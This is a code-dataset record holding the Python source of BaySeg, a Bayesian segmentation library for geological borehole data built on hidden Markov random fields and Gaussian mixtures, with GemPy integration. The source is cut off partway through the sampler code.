"line_number": 12, "usage_type": "name"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 15, "usage_type": "attribute"}, {"api_name": "streamlit.title", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 47, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 48, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 51, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 54, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 76, "usage_type": "name"}, {"api_name": "streamlit.title", "line_number": 82, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 86, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 92, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 118, "usage_type": "call"}, {"api_name": "plotly.express.set_mapbox_access_token", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 121, "usage_type": "name"}, {"api_name": "plotly.express.scatter_mapbox", "line_number": 124, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 124, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 125, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 125, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 137, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 141, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 144, "usage_type": "call"}, {"api_name": 
"streamlit.selectbox", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 151, "usage_type": "call"}, {"api_name": "plotly.express.set_mapbox_access_token", "line_number": 160, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 160, "usage_type": "name"}, {"api_name": "plotly.express.scatter_mapbox", "line_number": 163, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 163, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 164, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 164, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 185, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 188, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 191, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 191, "usage_type": "name"}, {"api_name": "streamlit.write", "line_number": 193, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 195, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 199, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 202, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 208, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 217, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 217, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 220, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 245, "usage_type": "call"}, {"api_name": "plotly.express.box", "line_number": 254, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 254, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 257, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 263, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 266, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 269, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 270, "usage_type": "call"}, {"api_name": "pandas.Grouper", "line_number": 278, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 281, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 281, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 282, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 282, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 286, "usage_type": "call"}]}
+{"seq_id": "25516676893", "text": "\"\"\"\nBaySeg is a Python library for unsupervised clustering of n-dimensional data sets, designed for the segmentation of\none-, two- and three-dimensional data in the field of geological modeling and geophysics. The library is based on the\nalgorithm developed by Wang et al., 2017 and combines Hidden Markov Random Fields with Gaussian Mixture Models in a\nBayesian inference framework.\n\n************************************************************************************************\nReferences\n\n[1] Wang, H., Wellmann, J. F., Li, Z., Wang, X., & Liang, R. Y. (2017). A Segmentation Approach for Stochastic\n Geological Modeling Using Hidden Markov Random Fields. Mathematical Geosciences, 49(2), 145-177.\n\n************************************************************************************************\n@authors: Alexander Schaaf, Hui Wang, Florian Wellmann\n************************************************************************************************\nBaySeg is licensed under the GNU Lesser General Public License v3.0\n************************************************************************************************\n\"\"\"\n\nimport numpy as np # scientific computing library\nfrom sklearn import mixture # gaussian mixture model\nfrom scipy.stats import multivariate_normal, norm # normal distributions\nfrom copy import copy\nfrom itertools import combinations\nimport tqdm # smart-ish progress bar\nimport matplotlib.pyplot as plt # 2d plotting\nfrom matplotlib import gridspec, rcParams # plot arrangements\nfrom .colors import cmap, cmap_norm # custom colormap\nfrom .ie import *\nimport pandas as pd\nfrom statistics import mode\nimport heapq as hq\n\nimport sys\nsys.path.append(\"C:/Users/Tobias Giesgen/PycharmProjects/gempy\")\nimport gempy as gp\n\nplt.style.use('bmh') # plot style\n\n\nclass BaySeg:\n def __init__(self, data, n_labels, raw_data, feature_names, boreholes, gp_resolution, beta_init=1, inc_gempy = False,\n stencil=None, normalize=True, plot=False):\n \"\"\"\n\n Args:\n data (:obj:`np.ndarray`): Multidimensional data array containing all observations (features) in the\n following format:\n\n 1D = (Y, F)\n 2D = (Y, X, F)\n 3D = (Y, X, Z, F)\n\n n_labels (int): Number of labels representing the number of clusters to be segmented.\n beta_init (float): Initial penalty value for Gibbs energy calculation.\n stencil (int): Number specifying the stencil of the neighborhood system used in the Gibbs energy\n calculation.\n\n \"\"\"\n # TODO: [DOCS] Main object description\n\n # store initial data\n self.data = data\n # get shape for physical and feature dimensions\n self.shape = np.shape(data)\n self.phys_shp = np.array(self.shape[:-1])\n\n self.inc_gempy = inc_gempy\n\n # get number of features\n self.n_feat = self.shape[-1]\n\n # gempy properties\n self.gp_resolution = gp_resolution\n\n # GRAPH COLORING\n self.stencil = stencil\n self.colors = pseudocolor(self.shape, self.stencil)\n\n # ************************************************************************************************\n # fetch dimensionality, coordinate and feature vector from input data\n\n # 1D\n if len(self.shape) == 2:\n # 1d case\n self.dim = 1\n # create coordinate vector\n # self.coords = np.array([np.arange(self.shape[0])]).T\n # feature vector\n self.feat = self.data\n\n\n # 2D\n elif len(self.shape) == 3:\n # 2d case\n self.dim = 2\n # create coordinate vector\n # y, x = np.indices(self.shape[:-1])\n # print(y, x)\n # self.coords = np.array([y.flatten(), 
x.flatten()]).T\n\n # feature vector\n self.feat = np.array([self.data[:, :, f].ravel() for f in range(self.n_feat)]).T\n\n # 3D\n elif len(self.shape) == 4:\n # 3d case\n raise Exception(\"3D segmentation not yet supported.\")\n\n # mismatch\n else:\n raise Exception(\"Data format appears to be wrong (neither 1-, 2- or 3-D).\")\n\n if normalize:\n self.normalize_feature_vectors()\n\n # ************************************************************************************************\n # INIT STORAGE ARRAYS\n\n # self.betas = [beta_init] # initial beta\n # self.mus = np.array([], dtype=object)\n # self.covs = np.array([], dtype=object)\n # self.labels = np.array([], dtype=object)\n\n # ************************************************************************************************\n # INIT GAUSSIAN MIXTURE MODEL\n self.n_labels = n_labels\n self.gmm = mixture.GaussianMixture(n_components=n_labels, covariance_type=\"full\")\n self.gmm.fit(self.feat)\n # do initial prediction based on fit and observations, store as first entry in labels\n\n # ************************************************************************************************\n # INIT LABELS, MU and COV based on GMM\n # TODO: [GENERAL] storage variables from lists to numpy ndarrays\n self.labels = [self.gmm.predict(self.feat)]\n # INIT MU (mean from initial GMM)\n self.mus = [self.gmm.means_]\n # INIT COV (covariances from initial GMM)\n self.covs = [self.gmm.covariances_]\n\n self.labels_probability = []\n self.storage_gibbs_e = []\n self.storage_like_e = []\n self.storage_te = []\n self.storage_gempy_e = []\n\n self.beta_acc_ratio = np.array([])\n self.beta_gp_acc_ratio = np.array([])\n self.cov_acc_ratio = np.array([])\n self.mu_acc_ratio = np.array([])\n\n # ************************************************************************************************\n # Initialize PRIOR distributions for beta, mu and covariance\n # BETA\n if self.dim == 1:\n self.prior_beta = norm(beta_init, np.eye(1) * 100)\n self.betas = [beta_init]\n elif self.dim == 2:\n if self.stencil == \"4p\":\n beta_dim = 2\n elif self.stencil == \"8p\" or self.stencil is None:\n beta_dim = 4\n\n self.betas = [[beta_init for i in range(beta_dim)]]\n self.prior_beta = multivariate_normal([beta_init for i in range(beta_dim)], np.eye(beta_dim) * 100)\n\n elif self.dim == 3:\n raise Exception(\"3D not yet supported.\")\n\n if inc_gempy == True:\n if self.stencil == \"4p\":\n beta_dim2 = 2\n elif self.stencil == \"8p\" or self.stencil is None:\n beta_dim2 = 4\n self.betas_gp = [[beta_init for i in range(beta_dim2)]]\n self.prior_beta_gp = multivariate_normal([beta_init for i in range(beta_dim2)], np.eye(beta_dim2) * 100)\n else:pass\n\n # MU\n # generate distribution means for each label\n prior_mu_means = [self.mus[0][label] for label in range(self.n_labels)]\n # generate distribution covariances for each label\n prior_mu_stds = [np.eye(self.n_feat) * 100 for label in range(self.n_labels)]\n # use the above to generate multivariate normal distributions for each label\n self.priors_mu = [multivariate_normal(prior_mu_means[label], prior_mu_stds[label]) for label in\n range(self.n_labels)]\n\n # COV\n # generate b_sigma\n self.b_sigma = np.zeros((self.n_labels, self.n_feat))\n for l in range(self.n_labels):\n self.b_sigma[l, :] = np.log(np.sqrt(np.diag(self.gmm.covariances_[l, :, :])))\n # generate kesi\n self.kesi = np.ones((self.n_labels, self.n_feat)) * 100\n # generate nu\n self.nu = self.n_feat + 1\n # 
*************************************************************************************************\n '''Create Gempy model from initial data'''\n self.boreholes = boreholes\n self.raw_data = raw_data\n self.feature_names = feature_names\n self.n_boreholes = len(boreholes)\n\n def create_gempy(self, labels, raw_data, labels_prob, plot):\n print('Gempy model under construction:')\n \"\"\"\n Creates a gempy model with the labels taken from the initial Gaussian Mixture model\n\n Args:\n labels: labeling (vector containing values corresponding to a label)\n raw_data(pandas_dataframe): X, Y, Z, Well Name, Log I, Log II, Log III...\n feature_names (list with strings): names of the logs (e.g. 'IND' or 'PE')\n boreholes (list of strings): names of the boreholes (e.g. 'BH1' or 'Well1')\n\n Out: lith_block[0]: label for each grid point in the 3D gempy model (shape: gp_resolution^3 x 1)\n --> reshape(gp_res, gp_res, gp_res)\n \"\"\"\n\n self.labels_gp = labels\n self.labels_prob_gp = labels_prob\n # **************************************************************************************************************\n # Zoning each borehole to find the boundaries between the zones or units (based on segmented data)\n\n self.boundary = []\n self.formation = []\n len_tot = 0\n\n for i in range(self.n_boreholes):\n self.pos = np.where(self.raw_data == self.boreholes[i])[0] # split data in boreholes\n self.boundary_temp2, self.formation_temp = self.find_boundaries_new(self.labels_prob_gp[self.pos],\n self.n_labels) # find boundary in each borehole\n\n for k in range(self.n_labels):\n self.formation.append(self.formation_temp[k])\n\n for k in range(self.n_labels - 1):\n # save boundaries ()\n self.boundary.append((self.boundary_temp2[k] + len_tot - 1))\n self.boundary.append(self.pos[-1])\n # print('Borehole', i + 1, 'of', self.n_boreholes, 'is zoned...')\n\n len_tot = len_tot + len(self.pos)\n\n self.boundary, self.formation = zip(*sorted(zip(self.boundary, self.formation)))\n self.boundary = list(self.boundary)\n self.formation = list(self.formation)\n\n print('Borehole zoning finished!')\n\n # create gempy_file including X,Y,Z,labels,borehole name\n #self.formation = list(range(self.n_boreholes))\n #self.boundary.sort()\n #self.formation.append(mode(self.labels_gp[0:self.boundary[0]]))\n #for k in range(self.n_labels):\n #self.formation.append(mode(self.labels_gp[self.boundary[k]:self.boundary[k+1]]))\n #self.formation = [self.formation for x in range(self.n_labels)]\n #self.formation = [item for sublist in self.formation for item in sublist]\n\n self.gempy = pd.DataFrame({'X': raw_data.X[self.boundary], 'Y': raw_data.Y[self.boundary],\n 'Z': raw_data.Z[self.boundary], 'formation': self.formation,\n 'borehole': raw_data['Well Name'][self.boundary]})\n\n # rename the layers to put in gempy (x --> layer x+1 | e.g. 
0 --> layer 1)\n        for k in range(0, 1 + len(set(list(self.gempy['formation'])))):\n            self.gempy['formation'] = self.gempy['formation'].replace(to_replace=k, value='Layer %d' % (k + 1))\n\n        # save gempy_input file as csv-file\n        self.gempy = self.gempy.sort_values('formation').reset_index(drop=True)\n\n        self.gempy.to_csv('../bayseg/data_temp/GemPy_BaySeg_temp.csv', index=False)\n\n        # execute gempy (load input files | interfaces + orientations)\n        self.geo_data = gp.create_data([int(min(self.gempy.X) - min(self.gempy.X)*0.1),\n                                        int(max(self.gempy.X) + max(self.gempy.X)*0.1),\n                                        int(min(self.gempy.Y) - min(self.gempy.Y)*0.1),\n                                        int(max(self.gempy.Y) + min(self.gempy.Y)*0.1),\n                                        int(min(self.gempy.Z) + min(self.gempy.Z)*0.1), 0],\n                                       [self.gp_resolution, self.gp_resolution, self.gp_resolution],\n                                       # path_o=\"../data/Gempy_Simple_4_layer_90degrees_orientation.csv\",\n                                       path_i=\"../bayseg/data_temp/GemPy_BaySeg_temp.csv\")\n\n        # extract the stratigraphic order from the saved formations (dropping the basement)\n        self.series = pd.unique(np.flipud(self.geo_data.interfaces.sort_values('Z').formation)[:-1])\n        if 'basement' in self.series:\n            self.series = np.delete(self.series, np.where(self.series == 'basement')[0][0])\n        #list(self.gempy.loc[np.where(self.gempy.borehole == self.boreholes[0])[0]]\n        #     .sort_values('Z',ascending = False).formation.values)\n\n        # set orientation information\n        self.save_ori = []\n        for i in range(1, self.n_labels+1):\n            ori_points = self.nearest_points(i)\n            gp.set_orientation_from_interfaces(self.geo_data, ori_points)\n            self.save_ori.append(ori_points)\n\n        # set stratigraphic pile for gempy\n        gp.set_series(self.geo_data, {\"Strat_Series\": list(self.series)},\n                      order_series=[\"Strat_Series\"],\n                      order_formations=list(self.series), verbose=0)\n\n        # interpolate the data in the 3D gempy model (full theano compiling only for the first iteration)\n        if len(self.labels) == 1:\n            self.interp_data = gp.InterpolatorData(self.geo_data, u_grade=[1], output='geology', compile_theano=True,\n                                                   dtype='float64', theano_optimizer='fast_compile')\n        else: self.interp_data.update_interpolator(self.geo_data)\n\n        # compute gempy model\n        self.lith_block, self.fault_block = gp.compute_model(self.interp_data)\n\n        # activate plotting of gempy model section\n        if len(self.labels) == self.n_inter:\n            if plot == '2dx':\n                gp.plotting.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='x', plot_data=True)\n                # gp.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='x', plot_data=True)\n            elif plot == '2dy':\n                gp.plotting.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='y', plot_data=True)\n                # gp.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='y', plot_data=False)\n            elif plot == '3d':\n                ver_s, sim_s = gp.get_surfaces(self.interp_data, self.lith_block[1], original_scale=True)\n                gp.plotting.plot_surfaces_3D_real_time(self.geo_data, self.interp_data, ver_s, sim_s)\n            else: pass\n\n        # renaming lith_block in the same way as self.labels (gempy renames the labels from 1 to n_labels)\n        self.rename_lith_block()\n        #self.lith_block[0] = np.round(self.lith_block[0], 0)\n\n        #for i in range(self.n_labels):\n            #np.place(self.lith_block[0], self.lith_block[0] == i + 1,\n                     #[int(s) for s in self.series[i].split()
\n        # create index_gempy (computed only in the first iteration because the grid does not change)\n        self.gempy_indicies()\n\n        print('Gempy model finished!')\n\n    def rename_lith_block(self):\n        self.lith_block[0] = np.round(self.lith_block[0], 0)\n\n        name_temp = []\n        name_temp.append(self.labels[-1][0:self.boundary[0]])\n\n        for i in range(self.n_labels - 1):\n            name_temp.append(self.labels[-1][self.boundary[i]:self.boundary[i + 1]])\n\n        # majority vote: map each gempy id (1..n_labels) to the BaySeg label that dominates\n        # the corresponding depth interval (+10/-10 avoids overwriting inside the loop)\n        for k in range(self.n_labels):\n            lab = np.where(np.bincount(name_temp[k], minlength=self.n_labels) ==\n                           max(np.bincount(name_temp[k], minlength=self.n_labels)))[0][0]\n\n            self.lith_block[0][np.where(self.lith_block[0] == k + 1)[0]] = lab + 10\n\n        self.lith_block[0] = self.lith_block[0] - 10\n\n    def gempy_indicies(self):\n        """\n        Finds the indices in the 3D gempy grid which are closest to the borehole data points\n\n        Out: indices of the gempy grid cells nearest to each borehole data point\n        """\n        # build vector containing the coordinates of all borehole data points\n        self.coords = self.raw_data.loc[:, ['X', 'Y', 'Z']].values\n\n        self.index_temp = []\n        self.index_gempy = []\n\n        # reshape the grid in the same way as the gempy labels for the gibbs energy calculation\n        for i in range(self.gp_resolution):\n            self.index_temp.append(self.geo_data.grid.values.reshape(\n                self.gp_resolution, self.gp_resolution,\n                self.gp_resolution, 3)[:, :, i, :].reshape(\n                self.gp_resolution ** 2, 3))\n\n        self.index_temp = np.asarray(self.index_temp).reshape(self.gp_resolution ** 3, 3)\n\n        # index_gempy = minimum (gempy_coords - borehole_coords[i])\n        for i in range(len(self.coords)):\n            self.index_gempy.append(np.sum(np.abs(self.index_temp - self.coords[i]), axis=1).argmin())\n\n    def find_boundaries_new(self, labels_proba, n):\n        max_prob = np.sum(labels_proba, axis=0)\n\n        likelihood_sum = []\n        for i in range(len(labels_proba) + 1):\n            likelihood_sum.append(np.sum(labels_proba[0:i], axis=0))\n\n        likelihood_sum_norm = likelihood_sum / max_prob\n\n        b_temp = []\n        formation = []\n        for k in range(n):\n            lst = np.arange(n)\n            lst = np.delete(lst, k)\n            cum_like = n * likelihood_sum_norm[:, k] - np.sum(likelihood_sum_norm[:, lst], axis=1)\n            b_temp.append(np.where(cum_like == max(cum_like))[0][0])\n            formation.append(k)\n\n        b_temp.sort()\n        b_temp = b_temp[0:n - 1]\n        return b_temp, formation\n\n    def find_boundaries(self, seg_data, n):\n        """\n        Finds the zone boundaries which minimize the total within-zone variance\n        --> applied to each borehole separately\n\n        Args:\n            seg_data: labels for each data point in one borehole\n            n: number of zones\n\n        Out: positions of the boundaries in the borehole\n        """\n        # enumerate all admissible boundary tuples: boundaries start at index 2, lie at\n        # least 2 samples apart and leave at least one sample for the last zone\n        var_t = []\n        for comb in combinations(range(2, len(seg_data) - 1), n - 1):\n            if any(comb[c + 1] - comb[c] < 2 for c in range(n - 2)):\n                continue\n            edges = (0,) + comb + (len(seg_data) - 1,)\n            total_var = sum(np.var(seg_data[edges[z]:edges[z + 1]]) for z in range(n))\n            var_t.append((total_var,) + comb)\n\n        # the boundary tuple with the smallest summed within-zone variance wins\n        return min(var_t)[1:n]\n\n    def calc_gempy_energy_vect(self, beta, verbose=False):\n        # calculate the gibbs energy contributed by the gempy model; this has to be done\n        # plane-wise because the gibbs energy routine is 2D --> gempy planes with constant z\n        self.gempy_plains = self.lith_block[0].reshape(self.gp_resolution, self.gp_resolution, self.gp_resolution)\n        self.gempy_energy_temp = []\n\n        # calculate gibbs energy for each gempy Z-plane\n        for i in range(self.gp_resolution):\n            self.gempy_energy_temp.append(\n                self._calc_gibbs_energy_vect(self.gempy_plains[:, :, i].reshape(self.gp_resolution ** 2),\n                                             beta, dim=2, verbose=verbose))  # 2D energy from the gempy model\n        # reshape\n        self.gempy_energy_temp_total = np.asarray(self.gempy_energy_temp).reshape(self.gp_resolution ** 3, self.n_labels)\n        return self.gempy_energy_temp_total[self.index_gempy]\n\n    # ************************************************************************************************\n    def fit(self, n, beta_jump_length=10, mu_jump_length=0.0005, cov_volume_jump_length=0.00005,\n            theta_jump_length=0.0005, t=1., verbose=False, fix_beta=False, plot=False):\n        """Fit the segmentation parameters to the given data.\n\n        Args:\n            n (int): Number of iterations.\n            beta_jump_length (float): Hyperparameter specifying the beta proposal jump length.\n            mu_jump_length (float): Hyperparameter for the mean proposal jump length.\n            cov_volume_jump_length (float):\n            theta_jump_length (float):\n            t (float):\n            verbose (bool or :obj:`str`):\n            fix_beta (bool):\n\n        """\n        self.n_inter = n\n        for g in tqdm.trange(n):\n            self.gibbs_sample(t, beta_jump_length, mu_jump_length, cov_volume_jump_length, theta_jump_length,\n                              verbose, fix_beta, plot)\n
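\n    # ------------------------------------------------------------------\n    # Editor's note (usage sketch; the instance name is assumed, not taken\n    # from this file): a run of the sampler is typically driven as\n    #\n    #     seg.fit(n=100, beta_jump_length=10, plot=False)\n    #\n    # after which seg.labels, seg.mus, seg.covs and seg.betas hold the\n    # per-iteration draws that the diagnostics methods below visualize.\n    # ------------------------------------------------------------------\n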
    def gibbs_sample(self, t, beta_jump_length, mu_jump_length, cov_volume_jump_length, theta_jump_length, verbose,\n                     fix_beta, plot):\n        """Takes care of the Gibbs sampling. This is the main function of the algorithm.\n\n        Args:\n            t: Hyperparameter\n            beta_jump_length: Hyperparameter\n            mu_jump_length: Hyperparameter\n            cov_volume_jump_length: Hyperparameter\n            theta_jump_length: Hyperparameter\n            verbose (bool or :obj:`str`): Toggles verbosity.\n            fix_beta (bool): Fixes beta to the initial value if True, else adaptive.\n\n        Returns:\n            The function updates directly on the object variables and appends new draws of labels and\n            parameters to their respective storages.\n        """\n        # TODO: [GENERAL] In-depth description of the gibbs sampling function\n\n        # ************************************************\n        # CALCULATE TOTAL ENERGY\n        # 1 - calculate energy likelihood for each element and label\n        # way to avoid over-smoothing by the gibbs energy\n        energy_like = self.calc_energy_like(self.mus[-1], self.covs[-1])\n        if verbose == "energy":\n            print("likelihood energy:", energy_like)\n        # 2 - calculate gibbs/mrf energy\n        gibbs_energy = self._calc_gibbs_energy_vect(self.labels[-1], self.betas[-1], dim=1, verbose=verbose)\n        if verbose == "energy":\n            print("gibbs energy:", gibbs_energy)\n\n        # 5 - calculate total energy without gempy model\n        total_energy = energy_like + gibbs_energy\n        # CALCULATE PROBABILITY OF LABELS without gempy model\n        labels_prob = _calc_labels_prob(total_energy, t)\n\n        if self.inc_gempy == True and len(self.labels) == 1:\n            # create gempy model with old labels and calculate gempy energy\n            self.create_gempy(self.labels[-1], self.raw_data, labels_prob, plot)\n            gempy_energy = self.calc_gempy_energy_vect(self.betas_gp[-1])\n            # 5 - calculate total energy with gempy model\n            total_energy = energy_like + gibbs_energy + gempy_energy\n            # CALCULATE PROBABILITY OF LABELS with gempy model\n            labels_prob = _calc_labels_prob(total_energy, t)\n        else: pass\n\n        self.storage_te.append(total_energy)\n\n        # make copy of previous labels\n        new_labels = copy(self.labels[-1])\n\n        # draw new random sample and update old labeling, one graph color at a time\n        # TODO: create GemPy model and GemPy energy in each iteration of updating labels\n        # TODO: just insert the GemPy Energy based on old GemPy model?\n        # TODO: can be neglected because of computational time\n        # TODO: GemPy model is not considered when updating labels so far\n        for i, color_f in enumerate(self.colors):\n            new_labels[color_f] = draw_labels_vect(labels_prob[color_f])\n            # now recalculate gibbs energy and other energies from the mixture of old and new labels\n            gibbs_energy = self._calc_gibbs_energy_vect(new_labels, self.betas[-1], dim=1, verbose=verbose)\n            total_energy = energy_like + gibbs_energy\n            labels_prob = _calc_labels_prob(total_energy, t)\n\n        if self.inc_gempy == True:\n            # create gempy model with the updated labels and calculate gempy energy\n            self.create_gempy(new_labels, self.raw_data, labels_prob, plot)\n            gempy_energy = self.calc_gempy_energy_vect(self.betas_gp[-1])\n            total_energy = energy_like + gibbs_energy + gempy_energy\n            labels_prob = _calc_labels_prob(total_energy, t)\n        else: pass\n\n        self.labels_probability.append(labels_prob)\n        self.labels.append(new_labels)\n\n        # ************************************************************************************************\n        # calculate energy for component coefficient\n        # TODO: Check what component coefficient is and maybe add gempy energy\n        if self.inc_gempy == True:\n            energy_for_comp_coef = gibbs_energy\n            energy_for_comp_coef_gp = gempy_energy\n        else: energy_for_comp_coef = gibbs_energy\n        # print("ge shp:", gibbs_energy)\n        # 
************************************************************************************************\n        # CALCULATE COMPONENT COEFFICIENT\n        comp_coef = _calc_labels_prob(energy_for_comp_coef, t)\n        if self.inc_gempy == True:\n            comp_coef_gp = _calc_labels_prob(energy_for_comp_coef_gp, t)\n        # ************************************************************************************************\n        # ************************************************************************************************\n        # PROPOSAL STEP\n        # make proposals for beta, mu and cov\n        # beta depends on physical dimensions, for 1d its size is 1\n        beta_prop = self.propose_beta(self.betas[-1], beta_jump_length, dim=1)\n\n        if self.inc_gempy == True:\n            beta_prop_gp = self.propose_beta(self.betas_gp[-1], beta_jump_length, dim=2)\n        else: pass\n\n        mu_prop = self.propose_mu(self.mus[-1], mu_jump_length)\n        cov_prop = _propose_cov(self.covs[-1], self.n_feat, self.n_labels, cov_volume_jump_length, theta_jump_length)\n\n        # ************************************************************************************************\n        # Compare mu, cov and beta proposals with the previous values, then decide which to keep for the next iteration\n\n        # prepare next ones\n        mu_next = copy(self.mus[-1])\n        cov_next = copy(self.covs[-1])\n\n        # ************************************************************************************************\n        # UPDATE MU\n        for l in range(self.n_labels):\n            # log-prob prior density for mu\n            mu_temp = copy(mu_next)\n            mu_temp[l, :] = mu_prop[l, :]\n\n            lp_mu_prev = self.log_prior_density_mu(mu_next, l)\n            lp_mu_prop = self.log_prior_density_mu(mu_temp, l)\n\n            lmd_prev = self.calc_sum_log_mixture_density(comp_coef, mu_next, cov_next)\n            # calculate log mixture density for proposed mu\n            lmd_prop = self.calc_sum_log_mixture_density(comp_coef, mu_temp, cov_next)\n\n            # combine\n            log_target_prev = lmd_prev + lp_mu_prev\n            log_target_prop = lmd_prop + lp_mu_prop\n\n            mu_eval = evaluate(log_target_prop, log_target_prev)\n            if mu_eval[0]:\n                mu_next[l, :] = mu_prop[l, :]\n            else:\n                pass\n            self.mu_acc_ratio = np.append(self.mu_acc_ratio, mu_eval[1])\n\n        self.mus.append(mu_next)\n\n        # ************************************************************************************************\n        # UPDATE COVARIANCE\n        for l in range(self.n_labels):\n            cov_temp = copy(cov_next)\n            cov_temp[l, :, :] = cov_prop[l, :, :]\n\n            # log-prob prior density for covariance\n            lp_cov_prev = self.log_prior_density_cov(cov_next, l)\n            lp_cov_prop = self.log_prior_density_cov(cov_temp, l)\n\n            lmd_prev = self.calc_sum_log_mixture_density(comp_coef, mu_next, cov_next)\n            # calculate log mixture density for proposed cov\n            lmd_prop = self.calc_sum_log_mixture_density(comp_coef, mu_next, cov_temp)\n\n            # combine\n            log_target_prev = lmd_prev + lp_cov_prev\n            log_target_prop = lmd_prop + lp_cov_prop\n\n            cov_eval = evaluate(log_target_prop, log_target_prev)\n            if cov_eval[0]:\n                cov_next[l, :] = cov_prop[l, :]\n            else:\n                pass\n            self.cov_acc_ratio = np.append(self.cov_acc_ratio, cov_eval[1])\n\n        # append cov and mu\n        self.covs.append(cov_next)\n        self.storage_gibbs_e.append(gibbs_energy)\n        self.storage_like_e.append(energy_like)\n\n        if self.inc_gempy == True:\n            
self.storage_gempy_e.append(gempy_energy)\n        else: pass\n\n        if not fix_beta:\n            # ************************************************************************************************\n            # UPDATE BETA FOR well data\n            lp_beta_prev = self.log_prior_density_beta(self.betas[-1])\n            lp_beta_prop = self.log_prior_density_beta(beta_prop)\n\n            lmd_prev = self.calc_sum_log_mixture_density(comp_coef, self.mus[-1], self.covs[-1])\n\n            # calculate gibbs energy with new labels and proposed beta\n            gibbs_energy_prop = self._calc_gibbs_energy_vect(self.labels[-1], beta_prop, dim=1, verbose=verbose)\n            energy_for_comp_coef_prop = gibbs_energy_prop  # + self_energy\n            comp_coef_prop = _calc_labels_prob(energy_for_comp_coef_prop, t)\n\n            lmd_prop = self.calc_sum_log_mixture_density(comp_coef_prop, self.mus[-1], self.covs[-1])\n            log_target_prev = lmd_prev + lp_beta_prev\n            log_target_prop = lmd_prop + lp_beta_prop\n\n            beta_eval = evaluate(log_target_prop, log_target_prev)\n            if beta_eval[0]:\n                self.betas.append(beta_prop)\n            else:\n                self.betas.append(self.betas[-1])\n            self.beta_acc_ratio = np.append(self.beta_acc_ratio, beta_eval[1])  # store\n\n            # UPDATE BETA FOR the GemPy model\n            if self.inc_gempy == True:\n                lp_beta_prev = self.log_prior_density_beta(self.betas_gp[-1], dim=2)\n                lp_beta_prop = self.log_prior_density_beta(beta_prop_gp, dim=2)\n\n                lmd_prev = self.calc_sum_log_mixture_density(comp_coef_gp, self.mus[-1], self.covs[-1])\n\n                # calculate gempy energy with the proposed beta\n                gempy_energy_prop = self.calc_gempy_energy_vect(beta_prop_gp)\n                energy_for_comp_coef_prop_gp = gempy_energy_prop  # + self_energy\n                comp_coef_prop_gp = _calc_labels_prob(energy_for_comp_coef_prop_gp, t)\n\n                lmd_prop = self.calc_sum_log_mixture_density(comp_coef_prop_gp, 